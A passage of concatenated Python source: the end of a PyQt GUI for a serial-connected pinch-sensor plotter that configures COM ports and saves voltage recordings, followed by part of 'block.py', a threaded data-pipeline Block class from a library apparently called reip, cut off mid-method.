self.buttonConnect.setGeometry(QtCore.QRect(880, 10, 161, 25))
self.buttonConnect.setText("Connect")
self.buttonConnect.clicked.connect(self.start_connection)
# COM Config Window
self.comConfigWindow = QtGui.QMainWindow()
self.comConfigWindow.setWindowTitle("COM configuration")
self.comConfigWindow.setWindowFlags(QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowCloseButtonHint)
self.comConfigWindow.setFixedSize(240, 170)
self.buttonCancel = QtWidgets.QPushButton(self.comConfigWindow)
self.buttonCancel.setText("Cancel")
self.buttonCancel.setGeometry(QtCore.QRect(130, 120, 75, 23))
self.buttonCancel.clicked.connect(self.comConfigWindow.close)
self.buttonConfirm = QtWidgets.QPushButton(self.comConfigWindow)
self.buttonConfirm.setText("Confirm")
self.buttonConfirm.setGeometry(QtCore.QRect(40, 120, 75, 23))
self.buttonConfirm.clicked.connect(self.set_com)
self.threadCOM = COMThread()
self.buttonRefresh = QtWidgets.QPushButton(self.comConfigWindow)
self.buttonRefresh.setText("Refresh")
self.buttonRefresh.setGeometry(QtCore.QRect(150, 30, 75, 23))
self.buttonRefresh.clicked.connect(self.threadCOM.start)
self.comboCOM = QtWidgets.QComboBox(self.comConfigWindow)
self.comboCOM.setGeometry(QtCore.QRect(20, 30, 111, 21))
self.comboBaud = QtWidgets.QComboBox(self.comConfigWindow)
self.comboBaud.setGeometry(QtCore.QRect(20, 80, 111, 21))
for baudrate in [300, 1200, 2400, 4800, 9600, 19200, 38400, 57600, 74880,
115200, 230400, 250000, 500000, 1000000, 2000000]:
self.comboBaud.addItem(str(baudrate))
self.comboBaud.setCurrentText("2000000")
self.labelCOM = QtWidgets.QLabel(self.comConfigWindow)
self.labelCOM.setGeometry(QtCore.QRect(20, 10, 47, 13))
self.labelCOM.setText("COM port")
self.labelBaud = QtWidgets.QLabel(self.comConfigWindow)
self.labelBaud.setGeometry(QtCore.QRect(20, 60, 47, 13))
self.labelBaud.setText("Baudrate")
# Message Window
self.msgBox = QtWidgets.QMessageBox()
# Plotting
self.curve = self.plotItem.plot(time_buffer, voltage_buffer)
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
self.test_curve = self.plotItem.plot()
self.plot_timer = QtCore.QTimer()
self.plot_timer.timeout.connect(self.updater)
self.buttonPlot.clicked.connect(self.plot)
self.spinYLower.valueChanged.connect(self.update_graph)
self.spinYUpper.valueChanged.connect(self.update_graph)
self.spinX.valueChanged.connect(self.update_graph)
# Final Window Config
pinchSensorUI.setCentralWidget(self.centralWidget)
pinchSensorUI.setMenuBar(self.menuBar)
optionsMenu = self.menuBar.addMenu('&Options')
self.actionCOMConfig = optionsMenu.addAction("&Configure COM port")
self.actionCOMConfig.triggered.connect(self.com_config)
self.actionCOMReset = optionsMenu.addAction("&Disconnect COM port")
self.actionCOMReset.triggered.connect(self.disconnect)
self.actionCOMReset.setDisabled(True)
self.retranslateUi(pinchSensorUI)
QtCore.QMetaObject.connectSlotsByName(pinchSensorUI)
def retranslateUi(self, pinchSensorUI):
_translate = QtCore.QCoreApplication.translate
pinchSensorUI.setWindowTitle(_translate("pinchSensorUI", "Pinchsensor V3"))
self.buttonPlot.setText(_translate("pinchSensorUI", "Start Plot"))
self.buttonSaveCurrent.setText(_translate("pinchSensorUI", "Save Current Session"))
self.buttonSaveAll.setText(_translate("pinchSensorUI", "Save All Sessions"))
self.labelYUpper.setText(_translate("pinchSensorUI", "Upper limit (Y)"))
self.labelYLower.setText(_translate("pinchSensorUI", "Lower limit (Y)"))
self.labelAdjustYAxis.setText(_translate("pinchSensorUI", "Adjust axes"))
self.labelCurrentSession.setText(_translate("pinchSensorUI", "Current Session:"))
# self.lineFileName.setText(_translate("pinchSensorUI", "current_session.txt"))
def message_box(self, message, ex):
if message == "disconnected":
self.msgBox.setText("Successfully disconnected from device.")
self.msgBox.setIcon(1) # information
self.msgBox.setWindowTitle("Disconnected")
if message == "connected":
self.msgBox.setText("Successfully connected to device.")
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("Connected")
self.actionCOMReset.setEnabled(True)
if message == "connection_error":
self.msgBox.setText("Error trying to connect to device.\nCheck connection and try again.")
self.msgBox.setIcon(2) # warning
self.msgBox.setWindowTitle("Connection error")
if message == "communication_error":
self.msgBox.setText("Error communicating to device.\nPlease, try reconnecting.")
self.msgBox.setWindowTitle("Communication error")
self.msgBox.setIcon(3) # critical
self.connection_refresh()
time.sleep(1)
if message == "file_error":
self.msgBox.setText("Error saving %s." % ex)
self.msgBox.setIcon(2) # warning
self.msgBox.setWindowTitle("Save error")
if message == "file_saved":
self.msgBox.setText("%s saved successfully." % ex)
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("File saved")
if message == "files_saved":
self.msgBox.setText("All files for %s were saved." % ex)
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("Files saved")
if message == "file_saved_already":
self.msgBox.setText("Current recording has already been saved.")
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("File already saved")
if message == "files_saved_already":
self.msgBox.setText("All recordings have already been saved.")
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("Files already saved")
self.msgBox.exec_()
def com_config(self):
self.refresh_com()
self.comConfigWindow.show()
def refresh_com(self):
self.comboCOM.clear()
self.comboCOM.setDisabled(True)
self.comboCOM.addItem("Finding ports...")
self.refresh_()
def refresh_(self):
result = com_ports()
self.comboCOM.clear()
if result:
self.buttonConfirm.setEnabled(True)
self.comboCOM.setEnabled(True)
for port in result:
self.comboCOM.addItem(port)
self.comboCOM.setCurrentText(port)
else:
self.comboCOM.addItem("Ports not found")
self.comboCOM.setDisabled(True)
self.buttonConfirm.setDisabled(True)
def set_com(self):
ser.baudrate = int(self.comboBaud.currentText())
ser.port = self.comboCOM.currentText()
self.comConfigWindow.close()
def start_connection(self):
self.buttonConnect.setDisabled(True)
self.buttonConnect.setText("Connecting")
self.count = 0
self.connect_timer = QtCore.QTimer()
self.connect_timer.timeout.connect(self.attempt_connection)
self.connect_timer.start(1000)
def attempt_connection(self):
self.buttonConnect.setText("Connecting" + (self.count + 1) * ".")
if not ser.is_open:
try:
ser.open()
time.sleep(3)
try:
a = ser.read_all().decode()
if 'w' in a:
self.buttonConnect.setText("Connected")
self.buttonPlot.setEnabled(True)
self.message_box("connected", '')
self.actionCOMReset.setEnabled(True)
threading.Thread(target=write_serial, args=["on/stop_plot"]).start()
self.actionCOMConfig.setDisabled(True)
self.connect_timer.stop()
return
else:
self.count += 1
ser.close()
except (OSError, serial.SerialException):
pass
except (OSError, serial.SerialException):
self.count += 1
if self.count == 4:
self.buttonConnect.setText("Connect")
self.buttonConnect.setEnabled(True)
self.connect_timer.stop()
self.message_box("connection_error", '')
def disconnect(self):
global stop_plot
stop_plot = True
if ser.is_open:
ser.close()
ser.open()
ser.close()
self.connection_refresh()
self.message_box("disconnected", '')
def connection_refresh(self):
if ser.is_open:
ser.close()
if current_recording > 0:
self.buttonSaveCurrent.setEnabled(True)
if current_recording > 1:
self.buttonSaveAll.setEnabled(True)
self.actionCOMReset.setDisabled(True)
self.actionCOMConfig.setEnabled(True)
self.buttonPlot.setText("Start Plot")
self.buttonPlot.setDisabled(True)
self.buttonConnect.setEnabled(True)
self.buttonConnect.setText("Connect")
def update_graph(self):
global sample_size
sample_size = 164 * self.spinX.value()
self.spinYUpper.setMinimum(self.spinYLower.value() + 0.5)
self.spinYLower.setMaximum(self.spinYUpper.value() - 0.5)
self.graph_widget.plotView.setYRange(self.spinYLower.value(), self.spinYUpper.value())
self.graph_widget.plotView.setLimits(xMin=0, maxXRange=self.spinX.value())
if time_buffer:
self.graph_widget.plotView.setXRange(time_buffer[-1]-self.spinX.value(), time_buffer[-1])
else:
self.graph_widget.plotView.setXRange(0, self.spinX.value())
def plot(self):
try:
ser.inWaiting()
global stop_plot, current_recording, current_test
if not stop_plot:
stop_plot = True
self.buttonPlot.setText("Start Plot")
threading.Thread(target=write_serial, args=["on/stop_plot"]).start()
self.buttonPlot.setDisabled(True)
QtCore.QTimer.singleShot(500, self.enable_plot_button)
self.buttonSaveCurrent.setEnabled(True)
if current_recording > 0:
self.buttonSaveAll.setEnabled(True)
else:
stop_plot = False
self.lcdCurrentSession.display('%.2d' % (current_recording + 1))
self.plotItem.clear()
self.curve = self.plotItem.plot()
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
current_test = 0
self.treeTestTimes.clear()
self.buttonPlot.setText("Stop Plot")
self.buttonPlot.setDisabled(True)
QtCore.QTimer.singleShot(500, self.enable_plot_button)
self.buttonSaveAll.setDisabled(True)
self.buttonSaveCurrent.setDisabled(True)
threading.Thread(target=write_serial, args=["start_plot"]).start()
self.plot_timer.start()
except (OSError, serial.SerialException):
self.message_box("communication_error", '')
def enable_plot_button(self):
self.buttonPlot.setEnabled(True)
def updater(self):
global testing, rescaleX, last_triggers, time_buffer, current_test
if stop_plot:
testing = 0
last_triggers.clear()
self.plot_timer.stop()
return
if rescaleX:
self.graph_widget.plotView.setXRange(time_buffer[-1]-self.spinX.value(),
time_buffer[-1] + 0.1 * self.spinX.value())
self.curve.setData(time_buffer, voltage_buffer)
if time_buffer:
self.lcdTime.display('%.1f' % time_buffer[-1])
else:
self.clear_plot()
if len(last_triggers) > 6:
last_triggers.pop(0)
last_triggers.pop(0)
self.clear_plot()
if testing == 1:
current_test += 1
last_triggers.append(time_buffer[-1])
tree_item = [str(current_test), '%.3f' % time_buffer[-1], '-', '-']
tree_item = QtWidgets.QTreeWidgetItem(tree_item)
self.treeTestTimes.addTopLevelItem(tree_item)
self.treeTestTimes.scrollToBottom()
self.plotItem.addLine(x=time_buffer[-1]).setPen(pg.mkPen(color=(1, 100, 32), width=5))
self.curve.setPen(pg.mkPen(color=(255, 0, 0), width=2))
testing = 2
if testing == 3:
start_time = float(self.treeTestTimes.topLevelItem(current_test-1).text(1))
end_time = time_buffer[-1]
elapsed = end_time - start_time
tree_item = [str(current_test), '%.3f' % start_time, '%.3f' % end_time, '%.3f' % elapsed]
self.treeTestTimes.takeTopLevelItem(current_test-1)
self.treeTestTimes.addTopLevelItem(QtWidgets.QTreeWidgetItem(tree_item))
last_triggers.append(time_buffer[-1])
self.plotItem.addLine(x=time_buffer[-1]).setPen(pg.mkPen(color=(200, 0, 0), width=5))
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
testing = 0
def clear_plot(self):
self.plotItem.clear()
for index, trigger in enumerate(last_triggers):
if not index % 2:
self.plotItem.addLine(x=trigger).setPen(pg.mkPen(color=(1, 100, 32), width=5))
else:
self.plotItem.addLine(x=trigger).setPen(pg.mkPen(color=(200, 0, 0), width=5))
self.curve = self.plotItem.plot()
if testing == 0 or testing == 3:
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
if testing == 1 or testing == 2:
self.curve.setPen(pg.mkPen(color=(255, 0, 0), width=2))
def update_file_name(self):
if self.lineFileName.text()[-4:] == ".txt":
self.labelFileNameFirst.setText(self.lineFileName.text()[0:-4] + "_1.txt")
elif '.' not in self.lineFileName.text() and self.lineFileName.text():
self.labelFileNameFirst.setText(self.lineFileName.text() + "_1")
elif not self.lineFileName.text():
self.labelFileNameFirst.clear()
def file_save_current(self):
if full_recordings[current_recording - 1][4]:
self.message_box("file_saved_already", '')
return
name = self.lineFileName.text()
name = QtWidgets.QFileDialog.getSaveFileName(QtWidgets.QFileDialog(), caption="Save current recording",
directory=os.path.join(os.getcwd(), name),
filter="Text files (*.txt)")
if name[0]:
self.lineFileName.setText(os.path.split(name[0])[1])
self.update_file_name()
name = self.lineFileName.text()
try:
file = open(name, 'w')
date_time = full_recordings[current_recording-1][3]
file.write("#Data collection started on %s\n" % date_time[0][:-7])
file.write("#[Time] [Voltage] [Trigger]\n")
for i in range(len(full_recordings[current_recording-1][0])):
time_sample = full_recordings[current_recording-1][0][i]
voltage_sample = full_recordings[current_recording-1][1][i]
trigger_sample = full_recordings[current_recording-1][2][i]
file.write("%.3f %.3f %d\n" % (time_sample, voltage_sample, trigger_sample))
file.close()
self.message_box("file_saved", name)
full_recordings[current_recording-1][4] = True
except IOError:
self.message_box("file_error", name)
def file_save_all(self):
for is_saved in full_recordings:
if not is_saved[4]:
break
else:
self.message_box("files_saved_already", '')
return
name = self.lineFileName.text()[:-4]
while os.path.exists(name):
name = name + "_2"
name = QtWidgets.QFileDialog.getSaveFileName(QtWidgets.QFileDialog(), caption="Save all recordings",
directory=os.path.join(os.getcwd(), name))
if name[0]:
self.lineFileName.setText(os.path.split(name[0])[1])
self.lineFileName.setFocus(True)
self.update_file_name()
self.labelFileNameFirst.setText(self.labelFileNameFirst.text() + ".txt")
name = self.lineFileName.text()
if os.path.exists(name):
name = name + "_2"
os.mkdir(name)
for index, recording in enumerate(full_recordings):
try:
file = open(os.path.join(name, name + "_%d.txt" % (index+1)), 'w')
date_time = recording[3]
file.write("#Data collection started on %s\n" % date_time[2:-2])
file.write("#[Time] [Voltage] [Trigger]\n")
for i in range(len(recording[0])):
time_sample = recording[0][i]
voltage_sample = recording[1][i]
trigger_sample = recording[2][i]
file.write("%.3f %.3f %d\n" % (time_sample, voltage_sample, trigger_sample))
file.close()
full_recordings[index][4] = True
except IOError:
self.message_box("file_error", name + "_%d.txt" % (index+1))
break
else:
self.message_box("files_saved", name)
class GraphWidget(QtGui.QWidget):
def __init__(self, parent=None):
super(GraphWidget, self).__init__()
layout = QtGui.QHBoxLayout()
self.plotView = pg.PlotWidget()
layout.addWidget(self.plotView)
self.setLayout(layout)
class LineEdit(QtWidgets.QLineEdit):
def focusInEvent(self, event):
if self.text() == "pinchsensor_recording.txt":
self.clear()
self.selectAll()
QtWidgets.QLineEdit.focusInEvent(self, event)
def focusOutEvent(self, event):
if self.text() == "":
self.setText("pinchsensor_recording.txt")
if self.text()[-4:] != ".txt":
self.setText(self.text() + ".txt")
QtWidgets.QLineEdit.focusOutEvent(self, event)
class MainWindow(QtWidgets.QMainWindow):
def closeEvent(self, event):
if current_recording:
all_save = False
current_save = full_recordings[current_recording-1][4]
for is_saved in full_recordings:
if not is_saved[4]:
break
else:
all_save = True
closeBox = QtWidgets.QMessageBox()
closeBox.setWindowTitle("Quit")
closeBox.setIcon(1)
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
if not current_recording:
closeBox.setText("Are you sure you want to quit?")
elif current_save:
closeBox.setText("Last recording WAS saved.\nAre you sure you want to quit?")
if current_recording > 1:
if all_save:
closeBox.setText("All recordings were saved.\nAre you sure you want to quit?")
else:
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No |
QtWidgets.QMessageBox.SaveAll)
else:
closeBox.setText("Last recording was NOT saved.\nAre you sure you want to quit?")
if current_recording > 1:
if all_save:
closeBox.setText("All recordings were saved.\nAre you sure you want to quit?")
else:
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No |
QtWidgets.QMessageBox.SaveAll | QtWidgets.QMessageBox.Save)
else:
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No |
QtWidgets.QMessageBox.Save)
closeBox.setDefaultButton(QtWidgets.QMessageBox.No)
choice = closeBox.exec()
if choice == QtWidgets.QMessageBox.Yes:
global stop_plot
stop_plot = True
if ser.is_open:
ser.close()
ser.open()
ser.close()
event.accept()
if choice == QtWidgets.QMessageBox.Save:
ui.file_save_current()
event.ignore()
self.closeEvent(event)
if choice == QtWidgets.QMessageBox.SaveAll:
ui.file_save_all()
event.ignore()
self.closeEvent(event)
if choice == QtWidgets.QMessageBox.No:
event.ignore()
class SuddenDisconnect(QtWidgets.QWidget):
signal = QtCore.pyqtSignal()
class COMThread(QtCore.QThread):
def __init__(self):
QtCore.QThread.__init__(self)
def __del__(self):
self.wait()
def run(self):
ui.refresh_com()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
app.setStyle('Fusion')
pinchSensorUI = MainWindow()
ui = Ui_pinchSensorUI()
pinchSensorUI.show()
sys.exit(app.exec_())
# TODO connection assistant
|
block.py
|
import time
import threading
import warnings
from contextlib import contextmanager
import remoteobj
import reip
from reip.stores import Producer
from reip.util import text, Meta
'''
'''
__all__ = ['Block']
class _BlockSinkView:
'''This is so that we can select a subview of a block's sinks. This is similar
in principal to numpy views. The alternative is to store the state on the original
object, but that would have unintended consequences if someone tried to create two
different views from the same block.
'''
def __init__(self, block, idx):
self._block = block
self._index = idx
@property
def item(self): # can be a single sink, or multiple i.e. block[0] or block[:2]
return self._block.sinks[self._index]
@property
def items(self): # always a list
return reip.util.as_list(self.item)
def __iter__(self): # iterate over sink
return iter(self.items)
def __getitem__(self, key): # get sub index
return self.items[key]
def to(self, *others, squeeze=True, **kw):
'''Connect this blocks sinks to other blocks' sources.
.. code-block:: python
InputBlock().to(ProcessBlock())
'''
outs = [other(self.items, **kw) for other in others]
return outs[0] if squeeze and len(outs) == 1 else outs
def output_stream(self, strategy='all', source_strategy=all, **kw):
'''Create a Stream iterator which will let you iterate over the
outputs of a block.'''
return reip.Stream([s.gen_source(strategy=strategy, **kw) for s in self.items], strategy=source_strategy, **kw)
class Block:
'''This is the base instance of a block.
Arguments:
queue (int): the maximum queue length.
n_inputs (int, or None): the number of sources to expect. If None,
it will accept a variable number of sources.
n_outputs (int): the number of sinks to expect.
- If `n_outputs=0`, then there will be a single sink, that outputs no
buffer value, but does output metadata.
e.g.
```python
# block 1
return {'just some metadata': True}
# or
return [], {'just some metadata': True}
# block 2
def process(self, meta): # no buffer value
assert meta['just some metadata'] == True
```
- If `n_outputs=None`, then the block will have no sinks.
blocking (bool): should the block wait for sinks to have a free space
before processing more items?
max_rate (int): the maximum number of iterations per second. If the block
processes items any faster, it will throttle and sleep the required
amount of time to meet that requirement.
e.g. if max_rate=5, then an iteration will take at minimum 0.2s.
graph (reip.Graph, reip.Task, or False): the graph instance to be added to.
name ()
'''
_thread = None
_stream = None
_delay = 1e-4
parent_id, task_id = None, None
started = ready = done = closed = _terminated = False
processed = 0
controlling = False
max_rate = None
def __init__(self, n_inputs=1, n_outputs=1, queue=100, blocking=False, print_summary=True,
max_rate=None, min_interval=None, max_processed=None, graph=None, name=None,
source_strategy=all, extra_kw=True, extra_meta=None, log_level=None,
handlers=None, modifiers=None, input_modifiers=None, **kw):
self._except = remoteobj.LocalExcept(raises=True)
self.name = name or f'{self.__class__.__name__}_{id(self)}'
self.parent_id, self.task_id = reip.Graph.register_instance(self, graph)
self._print_summary = print_summary
# sources and sinks
# by default, a block takes a variable number of sources.
# If a block has a fixed number of sources, you can specify that
# and it will throw an exception when spawning if the number of
# sources does not match.
self._block_sink_queue_length = queue # needed for set sink count
self.n_expected_sources = n_inputs
self.sources, self.sinks = [], []
self.set_block_source_count(n_inputs)
self.set_block_sink_count(n_outputs)
# used in Stream class. Can be all(), any() e.g. source_strategy=all
self._source_strategy = source_strategy
# handlers are wrapper functions that can do things like catch errors and restart when a block is closing.
self.handlers = reip.util.as_list(handlers or [])
# modifiers are functions that can be used to alter the output of the block before they are
# sent to a sink
self.modifiers = reip.util.as_list(modifiers or [])
self.input_modifiers = reip.util.as_list(input_modifiers or [])
if min_interval and max_rate:
warnings.warn((
'Both max_rate ({}) and min_interval ({}) are set, but are '
'mutually exclusive (max_rate=1/min_interval). min_interval will'
'be used.').format(max_rate, min_interval))
if max_rate:
self.max_rate = max_rate
if min_interval:
self.min_interval = min_interval
self.max_processed = max_processed
self._put_blocking = blocking
self._extra_meta = reip.util.as_list(extra_meta or [])
if self._extra_meta:
# this will flatten a list of dicts into a single dict. Since call=False,
# if there is a list of dictionaries and a function, any dictionaries
# before the function will be collapsed, and any after will be left.
# Calling again (without call=False), will evaluate fully and return
# the a flattened dict.
self._extra_meta = reip.util.mergedict(self._extra_meta, call=False)
if extra_kw:
self.extra_kw = kw
for key, value in kw.items():
setattr(self, key, value)
elif kw:
raise TypeError('{} received {} unexpected keyword arguments: {}.'.format(
self, len(kw), set(kw)))
# block timer
self._sw = reip.util.Stopwatch(self.name)
self.log = reip.util.logging.getLogger(self, level=log_level)
# signals
self._reset_state()
@property
def min_interval(self):
return self.max_rate
@min_interval.setter
def min_interval(self, value):
self.max_rate = 1. / value if value is not None else value
def set_block_source_count(self, n):
# NOTE: if n is -1, no resize will happen
self.sources = reip.util.resize_list(self.sources, n, None)
def set_block_sink_count(self, n):
# NOTE: if n is None, no resize will happen
new_sink = lambda: Producer(self._block_sink_queue_length, task_id=self.task_id)
self.sinks = reip.util.resize_list(self.sinks, n, new_sink)
def _reset_state(self):
# state
self.started = False
self.ready = False
self.done = False
self.closed = False
self._terminated = False
# stats
self.processed = 0
self.old_processed = 0
self.old_time = time.time()
self._sw.reset()
self._except.clear()
def __repr__(self):
return 'Block({}): ({}/{} in, {} out; {} processed) - {}'.format(
self.name, sum(s is not None for s in self.sources),
self.n_expected_sources,
len(self.sinks), self.processed,
self.block_state_name)
@property
def block_state_name(self):
return (
(type(self._exception).__name__
if self._exception is not None else 'error') if self.error else
('terminated' if self.terminated else 'done') if self.done else
('running' if self.running else 'paused') if self.ready else
'started' if self.started else '--' # ??
) # add "uptime 35.4s"
# Graph definition
def __call__(self, *others, index=0, **kw):
'''Connect other block sinks to this blocks sources.
If the blocks have multiple sinks, they will be passed as additional
inputs.
.. code-block:: python
ProcessBlock()(InputBlock())
'''
j = next(
(i for i, s in enumerate(self.sources) if s is None), len(self.sources)
) if index == -1 else index
for i, other in enumerate(others):
# permit argument to be a block
# permit argument to be a sink or a list of sinks
if isinstance(other, Block):
sinks = other.sinks
elif isinstance(other, _BlockSinkView):
sinks = other.items
else:
sinks = reip.util.as_list(other)
if sinks:
# make sure the list is long enough
self.set_block_source_count(j + len(sinks))
# create and add the source
for j, sink in enumerate(sinks, j):
self.sources[j] = sink.gen_source(
task_id=self.task_id, **kw)
j += 1 # need to increment cursor so we don't repeat last index
return self
def to(self, *others, squeeze=True, **kw):
'''Connect this blocks sinks to other blocks' sources.
.. code-block:: python
InputBlock().to(ProcessBlock())
'''
outs = [other(self, **kw) for other in others]
return outs[0] if squeeze and len(outs) == 1 else outs
def __or__(self, other):
'''Connect blocks using Unix pipe syntax.
.. code-block:: python
InputBlock() | ProcessBlock()
'''
return self.to(*reip.util.as_list(other))
def __ror__(self, other):
'''Connect blocks using Unix pipe syntax. See :meth:`__or__`'''
return self(*reip.util.as_list(other))
def output_stream(self, **kw):
'''Create a Stream iterator which will let you iterate over the
outputs of a block.'''
return reip.Stream.from_block(self, **kw)
def __getitem__(self, key):
return _BlockSinkView(self, key)
# User Interface
def init(self):
'''Initialize the block.'''
def process(self, *xs, meta=None):
'''Process data.'''
return xs, meta
def finish(self):
'''Cleanup.'''
# main process loop
# TODO common worker class
def run(self, duration=None, **kw):
with self.run_scope(**kw):
self.wait(duration)
@contextmanager
def run_scope(self, raise_exc=True):
try:
self.spawn()
yield self
except KeyboardInterrupt:
self.terminate()
finally:
self.join(raise_exc=raise_exc)
def wait(self, duration=None):
for _ in reip.util.iters.timed(reip.util.iters.sleep_loop(self._delay), duration):
if self.done or self.error:
return True
def _main(self, _ready_flag=None, duration=None):
'''The main thread target function. Handles uncaught exceptions and
generic Block context management.'''
try:
self.started = True
self.closed = False
self.log.debug(text.blue('Starting...'))
time.sleep(self._delay)
with self._sw(), self._except(raises=False):
# create a stream from sources with a custom control loop
self._stream = reip.Stream.from_block_sources(
self, name=self.name, _sw=self._sw,
strategy=self._source_strategy)
# self.__first_time = True
# this lets us wrap the block's run function with retry loops, error suppression and
# whatever else might be useful
run = reip.util.partial(self.__main_run, _ready_flag=_ready_flag, duration=duration)
for wrapper in self.handlers[::-1]:
run = reip.util.partial(wrapper, self, run)
run()
finally:
try:
# propagate stream signals to sinks e.g. CLOSE
if self._stream.signal is not None:
self._send_sink_signal(self._stream.signal)
finally:
self.done = True
self.started = False
self.closed = True
self.log.debug(text.green('Done.'))
def __main_run(self, _ready_flag=None, duration=None):
# # This is to return from a retry loop that doesn't want to close
# if not self.__first_time and self.closed:
# return
# self.__first_time = False
try:
with self._stream:
self._sw.tick() # offset time delay due to the reip initialization (e.g. plasma store warm-up)
# block initialization
with self._sw('init'): #, self._except('init')
self.init()
self.ready = True
self.log.debug(text.green('Ready.'))
if _ready_flag is not None:
with self._sw('wait'):
_ready_flag.wait()
# the loop
loop = reip.util.iters.throttled(
reip.util.iters.timed(reip.util.iters.loop(), duration),
self.max_rate, delay=self._delay)
self.old_time = time.time() # offset self.init() time delay for proper immediate speed calculation
for _ in self._sw.iter(loop, 'sleep'):
inputs = self._stream.get()
if inputs is None:
break
# process each input batch
with self._sw('process'): #, self._except('process')
buffers, meta = inputs
if self._extra_meta:
meta.maps += reip.util.flatten(self._extra_meta, call=True, meta=meta)
for func in self.input_modifiers:
buffers, meta = func(*buffers, meta=meta)
outputs = self.process(*buffers, meta=meta)
for func in self.modifiers:
outputs = func(outputs)
# This block of code needs to be here or else self.processed is not counting calls to self.process() function
# but buffers generated by current block and thus self.processed will be zero or inacurate in a number of cases:
# (i) black hole block that is only consuming data, (ii) data source block that has a buitin buffer bundling/grouping capabilities
# We can always add another self.generated counter if we need/want to
self.processed += 1
# limit the number of blocks
if self.max_processed and self.processed >= self.max_processed:
self.close(propagate=True)
# send each output batch to the sinks
with self._sw('sink'):
self.__send_to_sinks(outputs, meta)
except KeyboardInterrupt as e:
self.log.info(text.yellow('Interrupting'))
self.log.exception(e)
# reip.util.print_stack('Interrupted here')
except Exception as e:
self.log.exception(e)
raise
finally:
self.ready = False
# finish up and shut down
self.log.debug(text.yellow('Finishing...'))
with self._sw('finish'): # , self._except('finish', raises=False)
self.finish()
def __send_to_sinks(self, outputs, meta_in=None):
'''Send the outputs to the sink.'''
source_signals = [None]*len(self.sources)
# retry all sources
for outs in outputs if reip.util.is_iter(outputs) else (outputs,):
if outs == reip.RETRY:
source_signals = [reip.RETRY]*len(self.sources)
elif outs == reip.CLOSE:
self.close(propagate=True)
elif outs == reip.TERMINATE:
self.terminate(propagate=True)
# increment sources but don't have any outputs to send
elif outs is None:
pass
# self._stream.next()
# increment sources and send outputs
else:
# See self.__main_run()
# self.processed += 1
# # limit the number of blocks
# if self.max_processed and self.processed >= self.max_processed:
# self.close(propagate=True)
# detect signals meant for the source
if self.sources:
if outs is not None and any(any(t.check(o) for t in reip.SOURCE_TOKENS) for o in outs):
# check signal values
if len(outputs) > len(self.sources):
raise RuntimeError(
'Too many signals for sources in {}. Got {}, expected a maximum of {}.'.format(
self, len(outputs), len(self.sources)))
for i, o in enumerate(outs):
if o is not None:
source_signals[i] = o
continue
# convert outputs to a consistent format
outs, meta = prepare_output(outs, input_meta=meta_in)
# pass to sinks
for sink, out in zip(self.sinks, outs):
if sink is not None:
sink.put((out, meta), self._put_blocking)
# increment sources
# self._stream.next()
for src, sig in zip(self.sources, source_signals):
if sig is reip.RETRY:
pass
else:
src.next()
def _send_sink_signal(self, signal, block=True, meta=None):
'''Emit a signal to all sinks.'''
self.log.debug(text.yellow(text.l_('sending', signal)))
for sink in self.sinks:
if sink is not None:
sink.put((signal, meta or {}), block=block)
# Thread management
def spawn(self, wait=True, _controlling=True, _ready_flag=None):
'''Spawn the block thread'''
try:
self.controlling = _controlling
self.log.debug(text.blue('Spawning...'))
# print(self.summary())
self._check_source_connections()
# spawn any sinks that need it
for s in self.sinks:
if hasattr(s, 'spawn'):
s.spawn()
self._reset_state()
self.resume()
self._thread = remoteobj.util.thread(self._main, _ready_flag=_ready_flag, daemon_=True, raises_=False)
# threading.Thread(target=self._main, kwargs={'_ready_flag': _ready_flag}, daemon=True)
self._thread.start()
if wait:
self.wait_until_ready()
if self.controlling:
self.raise_exception()
finally:
# thread didn't start ??
if self._thread is None or not self._thread.is_alive():
self.done = True
def _check_source_connections(self):
'''Check if there are too many sources for this block.'''
# check for any empty sources
disconnected = [i for i, s in enumerate(self.sources) if s is None]
if disconnected:
raise RuntimeError(f"Sources {disconnected} in {self} not connected.")
# check for exact source count
if (self.n_expected_sources is not None and self.n_expected_sources != -1
and len(self.sources) != self.n_expected_sources):
raise RuntimeError(
f'Expected {self.n_expected_sources} sources '
f'in {self}. Found {len(self.sources)}.')
def remove_extra_sources(self, n=None):
n = n or self.n_expected_sources
if n is not None and n != -1:
self.sources = self.sources[:n]
def wait_until_ready(self):
'''Wait until the block is initialized.'''
while not self.ready and not self.error and not self.done:
time.sleep(self._delay)
def join(self, close=True, terminate=False, raise_exc=None, timeout=None):
# close stream
if close:
self.close()
if terminate:
self.terminate()
# join any sinks that need it
for s in self.sinks:
if hasattr(s, 'join'):
s.join()
# close thread
if self._thread is not None:
self._thread.join(timeout=timeout)
if (self.controlling if raise_exc is None else raise_exc):
self.raise_exception()
if self._print_summary: # print now or part of the stats will be lost if the block is used inside of Task
print(self.stats_summary())
def raise_exception(self):
self._except.raise_any()
def log_exception(self):
for e in self._except.all():
self.log.exception(e)
@property
def _exception(self):
return self._except.last
@property
def all_exceptions(self):
return self._except.all()
def __export_state__(self):
return {
'_sw': self._sw,
'started': self.started, 'ready': self.ready,
'done': self.done, #'error': self.error,
'terminated': self.terminated,
# '_stream.terminated': self._stream.terminated,
# '_stream.should_wait': self._stream.should_wait,
# '_stream.running': self._stream.running,
'_except': self._except,
}
def __import_state__(self, state):
for k, v in state.items():
try:
x, ks = self, k.lstrip('!').split('.')
for ki in ks[:-1]:
x = getattr(x, ki)
setattr(x, ks[-1], v)
except AttributeError:
raise AttributeError('Could not set attribute {} = {}'.format(k, v))
# State management
def pause(self):
if self._stream is not None:
self._stream.pause()
def resume(self):
if self._stream is not None:
self._stream.resume()
def close(self, propagate=False):
if self._stream is not None:
self._stream.close()
self.closed = True
if propagate:
